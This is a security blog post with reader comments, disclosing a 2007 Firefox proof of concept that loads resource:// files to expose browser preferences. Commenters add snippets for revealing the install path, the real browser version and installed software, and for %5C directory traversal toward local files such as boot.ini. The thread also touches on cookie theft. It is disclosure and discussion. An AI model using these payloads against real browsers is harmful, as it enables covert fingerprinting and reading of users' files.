Cenzic 232 Patent
Paid Advertising
web application security lab

Read Firefox Settings (PoC)

Sergey Vzloman sent me a really interesting proof of concept this morning on how you can read Firefox settings. It dumps all the browser settings into JavaScript space. Here’s the PoC code:

<script>
function pref(param,value){
document.write ("<b>"+param+"</b> = "+value+"")
};
</script>
<script src="resource://gre/greprefs/security-prefs.js"></script>
<script src="resource://gre/greprefs/all.js"></script>

So as you probably would have expected, I did add it to Mr. T (click for an example in Firefox) so that it would be included as well when you’re in the process of doing recon. Very cool, and obviously can be used to know in very fine detail what the user is using and what specialized security settings they may have installed. Tricky. Thanks to Sergey for the code!

33 Responses to “Read Firefox Settings (PoC)”

  1. Aviv Raff Says:

    You can also add:

    for the XPInstall settings.

  2. RSnake Says:

    Sorry, Aviv you must change < to &lt; to get it to go through. I was interested in your comment though.

  3. Jordan Says:

    That comment reminds me of a wonderful PoC I have against any browser. The following javascript will locally execute code on any browser that sees it, and can even bypass NoScript! If you’re reading this, it’s already too late:

    Ok, I’m kidding. Was I the only one reminded of Fermat’s last theorem when they read that comment as it is now? “I have a truly marvelous proof which unfortunately cannot bypass the site’s filters.”

    I’m such a dork.

  4. Kyran Says:

    Since when was there a digg button? (/diggs)
    Anyways, this is great. Really adds to the recon a person can do.

  5. Ronald van den Heetkamp Says:

    I wonder why the resource:// is limited to those two folders, anyone an idea?

  6. Tribute Says:

    I tried the mr-t URL on internet explorer to see what it would do if anything and it has crashed that window of IE. It is unresponsive to all input including right-clicking the taskbar for that window.
    I’d try it on Firefox but can’t be bothered to install it as i’m at college :\

  7. Jordan Says:

    Yeah, so back to actually contributing. I think what Aviv was pointing out is use the same pref overloading function and access xpinstall.js:

    resource://gre/greprefs/xpinstall.js

    Also — it’s possible to hijack new variable creation isn’t it? I never did get it working when playing with it a while back, but I seem to recall it being doable. If so, might also go after browserconfig.properties if there’s ever anything useful there.

    resource://gre/browserconfig.properties

  8. RSnake Says:

    kyran - id bugged me about it for long enough I finally added it. I hope it’s not too annoying.

    Ronald - no clue! Probably a security measure, but I’m pretty sure knowing all that information is a security issue in of itself anyway.

    Tribute - any idea which version of IE you were using and on what OS? Any special plugins?

  9. Boris Says:

    This just dumps out the default settings, not the user’s current settings. You could get the default settings just as easily by grabbing those files from ftp.mozilla.org.

  10. RSnake Says:

    Ugh, you’re right. I just changed keyword.URL in about:config to http://search.yahoo.com/search?ei=UTF-8&fr=sfp&fspl=1&p= (since I prefer Yahoo’s search anyway) and sure enough it didn’t change. :-/ Is there any value in knowing the default? Does it change in any interesting way from version to version that’s worth looking at? Time to take it out of Mr. T.

  11. Dan Veditz Says:

    Ronald– resource: is used by Mozilla code to load local install files without invoking the “chrome” system. Some mozilla embedding environments use the browser engine but don’t need or want XUL. It only reads from the install location because that’s all it needs to do; there’s no point in letting it walk around your disk if it doesn’t need to.

    RSnake– this should only get you the default settings, which for 99.99% of people are going to be the untouched defaults that ship with the browser. Maybe a few corporate deployments will install altered defaults, and you could pick those up this way, but you won’t read actual user settings.

  12. Bipin "3~" Upadhyay Says:

    I tried it (from the Mr. T link) with IE7 on WinXP.
    The output doesn’t really seem to be interesting; the browser didn’t crash though.

    The first page page load rendered IE7.0 not detected. (A refresh detected IE7 correctly.)
    It also detected IE as the default browser; which it isn’t.
    Interesting is it!

  13. RSnake Says:

    Dan - thanks, got it

    Bipin- I removed it from Mr T, so that output is no longer there.

  14. Aviv Raff Says:

    One thing useful (?) you can grab is the directory where FF is installed:

    <LINK REL=”stylesheet” href=”resource://gre/”" type=”text/css” id=”x” />
    <script>
    alert(document.getElementById(”x”).sheet.href);
    </script>

  15. BK Says:

    I was playing around with the various Firefox URIs a while back (including resource)… you can actually traverse back up the local file systems by using a “%5c” (ex: resource:///..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini). I actually had a POC that enumerated software from a users local filesystem using the Resource URI and the %5c traversals.

    IE has a similar problem (although slightly more complicated). I let MS know and they’ll be fixing it soon, but I guess the FF Resource URI is out of the bag!

    BK

  16. Aviv Raff Says:

    Awsome finding, BK!
    Can you explain how you enumerated the files?
    As far as I know, you will need to use the resource URI in a readable object. Which one did you use?

    Back to the pref function. Another useful info is the real User Agent/Current FF version:
    <script>
    function pref(param,value){
    if (param==”general.useragent.extra.firefox”) {
    alert(”Your real FF version is: “+value)
    }
    };
    </script>
    <script src=”resource://gre/defaults/pref/firefox.js”></script>

    This will bypass the “User Agent Switcher” add-on.

  17. CrYpTiC MauleR Says:

    Anyone think of making a Firekeeper rule to detect this?

  18. BK Says:

    Aviv - Keep in mind that the Resource URI isn’t limited to .js files. It can be used to load other files as well. I simply used the resource URI to load javascript objects from the local file system. A simple example of this is using a javascript img object:

    var enum = new Image();
    enum.src = “resource:///..%5C..%5C..%5Cpath-to-software%5Cknown-image-file”;

    from here.. I simply checked to see if the js object was loaded or not. I actually had a small DB of known files associated with various pieces of software that could be loaded into js objects. In some cases, you could actually determine the version of software installed.

    Another dangerous item related to Resource, is you can actually control some of the contents in the first line of a Resource response. For example, if you use the dir traversal, you can actually place your content into the initial line.

    ex: resource:///..%5C..%5CYOUR-CONTENT-HERE%5C..%5C

    I was attempting to find the right mix of characters that could initiate a UXSS in the context of “resource” but I was unable too… maybe one of you can figure it out!

    BK

  19. Alex Says:

    This will give you the path of your current profile in Windows. Now you can regex the username from e.g. C:\documents and settings\bla\desktop\…..
    Works only locally so far.

    <LINK REL=”stylesheet” href=”res%6Furce://..%5C” type=”text/css” id=”path”>
    <script>
    alert(document.getElementById(”path”).sheet.href);
    </script>

  20. antichat Says:

    Can somebody find any bug in this site:
    http://forum.antichat.ru/

  21. Sergey Vzloman Says:

    I was tested resource URI as SCRIPT source for reading local files. Thanks to BK! My job is done :)

  22. eth00 Says:

    how to get data for example from:

    resource:///..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini
    resource:///..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CProgram%20Files%5Cdesktop.ini

    ?

  23. Ronald van den Heetkamp Says:

    @Dan Veditz

    Thanks for explaining, it seems that this all.js file is just a default install. I had a look at it, but I can’t find any juicy information. it shows that Javascript is enabled for instance, but that would fail if I have NoScript installed. Same with the locales, can be changed with extensions, So my fair guess it would generate a lot of false positives. And most of them are pretty standard; like white listing only addons.mozilla.org for extensions.

    Cool hack though, if anyone can make it remotely really read other local files or Firefox session & cookie files, i’dd be glad to hear :D

  24. Sergey Vzloman Says:

    This example can be used to known installed extensions:

    Search plugins: (like google.xml, yandex.xml, wikipedia-ru.xml)
    c:\Program Files\Mozilla Firefox\searchplugins\google.xml

    Installed dictionaries:
    c:\..\dictionaries\ru.aff
    c:\..\dictionaries\en.aff

    Extension Plugins:
    pligins\flashplayer.xpt
    pligins\NPJava32.dll
    pligins\QuickTimePlugin.class
    pligins\ShockwavePlugin.class

  25. Dan Veditz Says:

    Enjoy resource:///..%5C while you can — it will soon stop working

    https://bugzilla.mozilla.org/show_bug.cgi?id=367428

    (test builds of 2.0.0.4 and 1.5.0.12 release candidates available at ftp.mozilla.org in the Firefox “nightly” directory)

  26. tribute Says:

    RSnake- I was running IE6 on Win Server 2003. No plugins.
    I tried it at home on IE6 with XP and its fine. So not sure what the crash was about. I’ll try it again next week in college if I remember.

  27. Ronald van den Heetkamp Says:

    @Dan Veditz

    To my knowledge: resource:///..%5C only works locally, not remotely. Correct me if I’m wrong.

  28. Otsego Says:

    Nope, doesn’t work. Error console gives this;
    Security Error: Content at http://ha.ckers.org/blog/20070516/read-firefox-settings-poc/#comments may not load or link to resource:///..%5C.

  29. Thor Larholm Says:

    Even if the directory traversal vulnerability here is fixed we can still read any file from inside the Firefox install directory. This includes update.xml, install.log or even browserconfig.properties - the latter of which contains your homepage settings.

    http://larholm.com/2007/05/25/firefox-0day-local-file-reading/

  30. ebook search Says:

    Hi there,

    guess there is no way to find out the users profile directory, is there?
    that would be a real security flaw…

    btw: what about background ajax file uploads? If you know/guess the location of specific files you can upload them to your server, your visitors won’t recognize it. Is there anything you can do to protect yourself from such an “attack”?

    -ebook searchr

  31. mob.dev Says:

    Is it possible to steal cookies using an ajax backgound file-upload??

    I sketched a possible attack here (http://mobdev.tknerr.de/2007/06/01/cookie-stealing-using-ajax-backgound-file-upload/)

    I am sure this must have been discussed already, but IMHO this is still a big issue. Would be glad to hear your comments if the sketched attack is indeed so easily possible

    -ukio

  32. Alik Says:

    Great way to see FF plugins :)
    Do you think we can get what addons are installed for IE ?
    Perhaps we can see if IE responds to certain file types that addons interacts with and by that know what addons are installed, for example flash (.swf) ?
    What do you think ?

  33. Internet Threat Says:

    its pretty easy to produce i have coded a own script out of your method and its very useful.